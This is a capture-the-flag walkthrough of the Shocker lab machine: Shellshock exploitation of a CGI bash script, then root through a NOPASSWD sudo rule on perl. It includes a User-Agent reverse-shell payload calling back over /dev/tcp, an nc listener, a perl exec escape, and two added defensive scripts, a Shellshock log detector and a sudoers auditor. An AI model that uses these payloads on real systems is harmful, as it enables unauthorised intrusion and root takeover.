
Shocker

An Apache web server with CGI enabled served a bash-based script at /cgi-bin/user.sh on a host running unpatched Bash, so injecting the Shellshock payload (CVE-2014-6271) into the User-Agent header returned a reverse shell as user shelly.


Overview

Shocker is an easy Linux machine that demonstrates the Shellshock vulnerability (CVE-2014-6271) against an Apache server with CGI scripting enabled. Enumerating /cgi-bin/ with gobuster surfaces a bash-based CGI script; injecting the Shellshock payload into the User-Agent HTTP header executes arbitrary commands on the unpatched server, landing a reverse shell as shelly. From there a sudo rule granting NOPASSWD access to /usr/bin/perl provides an instant root shell via a GTFOBins one-liner.

Machine Matrix

Radar chart axes (scores not recoverable from the page): Enumeration, Real-Life, CVE, Custom Exploitation, CTF-like

The CVE axis dominates — Shellshock (CVE-2014-6271) is one of the most well-known weaponized web vulnerabilities — and the Real-Life score reflects that both CGI-exposed bash scripts and over-permissive sudo rules are routinely found on real production systems.

Recon

Port      Service              Notes
80/tcp    Apache httpd 2.4.18  Ubuntu; CGI enabled
2222/tcp  OpenSSH 7.2p2        Ubuntu 4ubuntu2.2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p80,2222 -sC -sV -Pn 10.10.10.X

The two open ports are HTTP on 80 and SSH on a non-standard port 2222. The web server banner identifies Apache 2.4.18 on Ubuntu — and knowing that CGI-capable Apache installations may expose /cgi-bin/ is the key lead to follow.

Enumeration

Confirm that /cgi-bin/ exists — a 403 means the directory is present but not browseable:

curl -s -o /dev/null -w "%{http_code}" http://10.10.10.X/cgi-bin/

Fuzz inside it for CGI scripts with common extensions:

gobuster dir -u http://10.10.10.X/cgi-bin/ \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x sh,cgi,pl,py -t 50

Gobuster returns http://10.10.10.X/cgi-bin/user.sh with a 200 status. Confirm the server runs it as a bash CGI script:

curl -s http://10.10.10.X/cgi-bin/user.sh

The response is a shell script that reports uptime — this is live CGI execution under bash. Verify that the running Bash version is vulnerable to Shellshock using the nmap script:

nmap -sV -p80 --script http-shellshock \
  --script-args uri=/cgi-bin/user.sh,cmd=id 10.10.10.X

The nmap script confirms CVE-2014-6271 is exploitable and returns the id output — the box is vulnerable to OS command injection via improper initialization of environment variables.

Foothold

GNU Bash prior to version 4.3 patch 25 incorrectly executes code that trails a function definition when importing environment variables. Apache passes HTTP headers as environment variables to CGI processes, so any header the attacker controls — including User-Agent — reaches the CGI script’s bash environment. The payload () { :;}; <command> is parsed as a function definition followed by arbitrary code; the code after } runs before the script even starts.
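Because Apache hands every request header to the CGI process as an environment variable, the marker that triggers the bug is also what a defender can look for in the access log: an empty-parameter function definition `() { ... }` followed by `;` in the request line, Referer or User-Agent. The detector below is an added example, not code from the original post; it parses Apache combined-format lines (a constructed sample is embedded), URL-decodes each field so an encoded copy of the marker in the query string is caught too, and reports which field carried it. The regexes and the `Finding` record are this example's own.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Apache "combined" log format; quoted fields may contain \" escapes, which is
# exactly how a Shellshock User-Agent carrying an inner bash -c "..." is logged.
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<agent>' + QUOTED + r')"'
)

# The Shellshock marker: an empty-parameter function definition "() { ... }"
# followed by ";" and trailing code. Whitespace inside is optional.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{[^}]*\}\s*;')


@dataclass
class Finding:
    host: str
    time: str
    field: str      # which log field carried the marker
    value: str      # the URL-decoded field contents


def is_shellshock_payload(value: str) -> bool:
    """True if the string (after URL-decoding) contains the function-definition marker."""
    return SHELLSHOCK_RE.search(unquote(value)) is not None


def scan_access_log(lines):
    """Return a Finding for every request line, Referer or User-Agent that carries the marker."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("request", "referer", "agent"):
            value = m.group(field)
            if is_shellshock_payload(value):
                findings.append(Finding(m.group("host"), m.group("time"), field, unquote(value)))
    return findings


# Constructed sample log lines (not from the original post): a benign request,
# the marker in User-Agent as the nmap id check would leave it, and a
# URL-encoded copy of the marker in the query string.
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.68.0"',
    '10.10.14.5 - - [01/Jan/2024:10:00:07 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 73 "-" '
    '"() { :;}; /bin/bash -c \\"id\\""',
    '10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /cgi-bin/user.sh?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 200 73 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.time} {f.host} shellshock marker in {f.field}: {f.value}")
```

Feed it real lines with `scan_access_log(open("/var/log/apache2/access.log"))`. Any hit against a `/cgi-bin/` path on a host whose Bash predates 4.3 patch 25 should be treated as a probable compromise, not just a scan; the fix on the server side is the distribution's bash update and, where CGI is not needed, disabling `mod_cgi` altogether.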

Start a listener:

nc -lvnp 9999

Fire the Shellshock reverse shell by placing the payload in the User-Agent header:

curl -s "http://10.10.10.X/cgi-bin/user.sh" \
  -H 'User-Agent: () { :;}; /bin/bash -c "bash -i >& /dev/tcp/10.10.14.X/9999 0>&1"'

The listener catches a shell as shelly (uid=1000).

User flag

cat /home/shelly/user.txt   # HTB{...}

The foothold lands directly as shelly, who owns user.txt — no lateral movement required.

Privilege Escalation

Check what shelly can run with sudo:

sudo -l

The output shows:

(root) NOPASSWD: /usr/bin/perl

shelly can run the Perl interpreter as root without supplying a password. Perl’s exec() replaces the current process with any given command — since sudo has already elevated the process to root, spawning /bin/bash yields a root shell. This is a privilege mismanagement finding: granting sudo access to any scripting language interpreter is functionally equivalent to granting unrestricted root access.
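The same reasoning can be turned into a check a defender runs before an attacker does: any sudo rule whose command is a shell or script interpreter, or `ALL`, grants root regardless of what the rule was meant to allow, and `NOPASSWD` removes the last friction. The auditor below is an added example, not code from the original post. It parses a deliberately simplified subset of sudoers syntax (plain `user host=(runas) TAG: cmd, cmd` rules; no aliases, `#include` directives or `Defaults` handling, which is this example's assumption), and also accepts `sudo -l` output of the form shown above. The sample sudoers content and the `INTERPRETERS` list are constructed for the example.

```python
import os
import re
from dataclasses import dataclass

# Shells and script interpreters: sudo access to any of these is equivalent to root,
# because each can exec() an arbitrary program once it is running as root.
INTERPRETERS = {"perl", "python", "python2", "python3", "ruby", "php", "lua",
                "node", "bash", "sh", "dash", "zsh", "awk", "gawk"}

# Simplified rule grammar: user host=(runas) TAG: cmd, cmd  (runas and tags optional)
RULE_RE = re.compile(
    r'^(?P<user>[^\s#]+)\s+(?P<host>[^\s=]+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z]+:\s*)*)'
    r'(?P<cmds>.+)$'
)


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    nopasswd: bool
    severity: str


def parse_rules(text):
    """Yield (user, runas, nopasswd, command) for each command in each rule line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # alias or other syntax this simplified parser does not model
        nopasswd = "NOPASSWD:" in (m.group("tags") or "")
        runas = m.group("runas") or "root"  # sudoers default when no runas clause is given
        for cmd in m.group("cmds").split(","):
            yield m.group("user"), runas, nopasswd, cmd.strip()


def audit_sudoers(text):
    """Flag rules granting ALL or an interpreter; NOPASSWD on an interpreter is critical."""
    findings = []
    for user, runas, nopasswd, cmd in parse_rules(text):
        if user == "root":
            continue  # root's own ALL rule is expected
        if cmd == "ALL":
            reason = "all"
        else:
            prog = os.path.basename(cmd.split()[0])
            if prog not in INTERPRETERS:
                continue
            reason = "interpreter"
        if reason == "interpreter" and nopasswd:
            severity = "critical"
        elif reason == "interpreter" or nopasswd:
            severity = "high"
        else:
            severity = "medium"
        findings.append(Finding(user, runas, cmd, nopasswd, severity))
    return findings


def audit_sudo_l(output, user):
    """Audit `sudo -l` lines such as '(root) NOPASSWD: /usr/bin/perl' for the given user."""
    rules = "\n".join(f"{user} ALL={line.strip()}"
                      for line in output.splitlines() if line.strip().startswith("("))
    return audit_sudoers(rules)


# Constructed sample /etc/sudoers content (not from the original post).
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
shelly  ALL=(root) NOPASSWD: /usr/bin/perl
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service, /usr/bin/python3
backup  ALL=(root) /usr/bin/rsync
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.severity}] {f.user} -> ({f.runas}) {f.command} nopasswd={f.nopasswd}")
```

The `deploy` rule shows why auditing per command matters: a rule that looks like a narrow service-restart grant also carries `/usr/bin/python3`, which is the same finding as the `perl` rule on this box. Run it on a real host with `audit_sudoers(open("/etc/sudoers").read())` as root, or on `sudo -l` output with `audit_sudo_l(output, "shelly")` from an unprivileged shell.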

Exploit with the GTFOBins one-liner:

sudo perl -e 'exec "/bin/bash"'

The prompt becomes root (uid=0(root)).

Root flag

cat /root/root.txt   # HTB{...}

Full compromise — Shellshock via CGI for the foothold and a NOPASSWD sudo interpreter escape for root.

This post is licensed under CC BY 4.0 by the author.